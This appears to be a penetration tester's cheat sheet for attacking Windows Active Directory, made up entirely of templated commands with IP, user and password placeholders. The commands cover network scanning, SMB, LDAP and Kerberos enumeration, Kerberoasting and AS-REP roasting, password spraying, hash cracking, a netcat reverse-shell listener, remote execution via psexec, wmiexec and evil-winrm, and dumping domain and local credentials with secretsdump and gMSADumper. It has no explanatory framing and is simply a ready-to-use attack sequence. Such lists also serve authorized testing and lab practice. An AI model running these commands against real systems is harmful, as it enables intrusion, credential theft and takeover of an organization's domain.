nmap -p- --open -sS --min-rate 5000 -n -Pn {{IP}} -vvv
echo '{{IP}} {{DC.DOMAIN}} {{DOMAIN}}' >> /etc/hosts
smbclient -L //{{IP}} -U {{USER}}
impacket-lookupsid {{DOMAIN}}/{{USER}}@{{IP}}
netexec smb {{IP}} --generate-krb5-file filename.conf
netexec smb {{IP}} -u '{{USER}}' -p '{{PASSWORD}}' --rid-brute
netexec smb {{IP}} -u '{{USER}}' -p '{{PASSWORD}}' --shares
netexec smb {{IP}} -u {{USER}} -p '{{PASSWORD}}' --pass-pol
netexec ldap {{IP}} -u '{{USER}}' -p '{{PASSWORD}}' --users
bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASSWORD}}' -ns {{IP}} -c all
kerbrute userenum --dc {{IP}} -d {{DOMAIN}} /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
rpcclient -U "" -N {{IP}}
certipy-ad find -u {{USER}} -p '{{PASSWORD}}' -dn {{DOMAIN}} -dc-ip {{IP}} -vulnerable
enum4linux {{IP}}
enum4linux-ng {{IP}}
ssh {{USER}}@{{IP}}
ssh {{USER}}@{{IP}} -i id_rsa
ftp -a {{IP}}
ftp {{USER}}@{{IP}}
impacket-GetNPUsers {{DOMAIN}}/ -no-pass -usersfile users.txt -dc-ip {{IP}} -format john
impacket-GetUserSPNs -dc-ip {{IP}} {{DOMAIN}}/{{USER}}:'{{PASSWORD}}' -request
impacket-getTGT {{DOMAIN}}/'{{USER}}':'{{PASSWORD}}' -dc-ip {{IP}}
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
netexec smb {{IP}} -u {{USER}} -p password.txt --continue-on-succes
netexec smb {{IP}} -u users.txt -p '{{PASSWORD}}' --continue-on-succes
python3 targetedKerberoast.py -v -d {{DOMAIN}} -u {{USER}} -p '{{PASSWORD}}' --request-user TARGET_USER
rlwrap -cAr nc -nlvp {{PORT}}
impacket-getST -spn 'cifs/{{DC.DOMAIN}}' -impersonate 'target_user' '{{DOMAIN}}/{{USER}}:{{PASSWORD}}'
./username-anarchy --input-file users.txt --select-format first,firstlast,first.last,firstlast[8],first[4]last[4],firstl,f.last,flast,lfirst,l.first,lastf,last,last.f,last.first,FLast,first1,fl,fmlast,firstmiddlelast,fml,FL,FirstLast,First.Last,Last > anarchy_users.txt
evil-winrm -i {{DOMAIN}} -u {{USER}} -p '{{PASSWORD}}'
xfreerdp3 /u:{{USER}} /p:'{{PASSWORD}}' /v:{{IP}}
impacket-mssqlclient {{USER}}@{{IP}} -windows-auth
impacket-psexec {{DOMAIN}}/{{USER}}:'{{PASSWORD}}'@{{IP}}
impacket-secretsdump {{DOMAIN}}/{{USER}}:'{{PASSWORD}}'@{{IP}}
impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
impacket-wmiexec {{DOMAIN}}/{{USER}}:'{{PASSWORD}}'@{{IP}}
python3 gMSADumper.py -u {{USER}} -p '{{PASSWORD}}' -d {{DOMAIN}}
netexec smb {{IP}} --local-auth -u {{USER}} -p '{{PASSWORD}}' --sam
netexec smb {{IP}} --local-auth -u {{USER}} -p '{{PASSWORD}}' --lsa
impacket-reg {{DOMAIN}}/{{USER}}:{{PASSWORD}}@{{IP}} query -keyName HKLM\SOFTWARE\
certipy-ad auth -pfx administrator.pfx -ldap-shell -dc-ip {{IP}}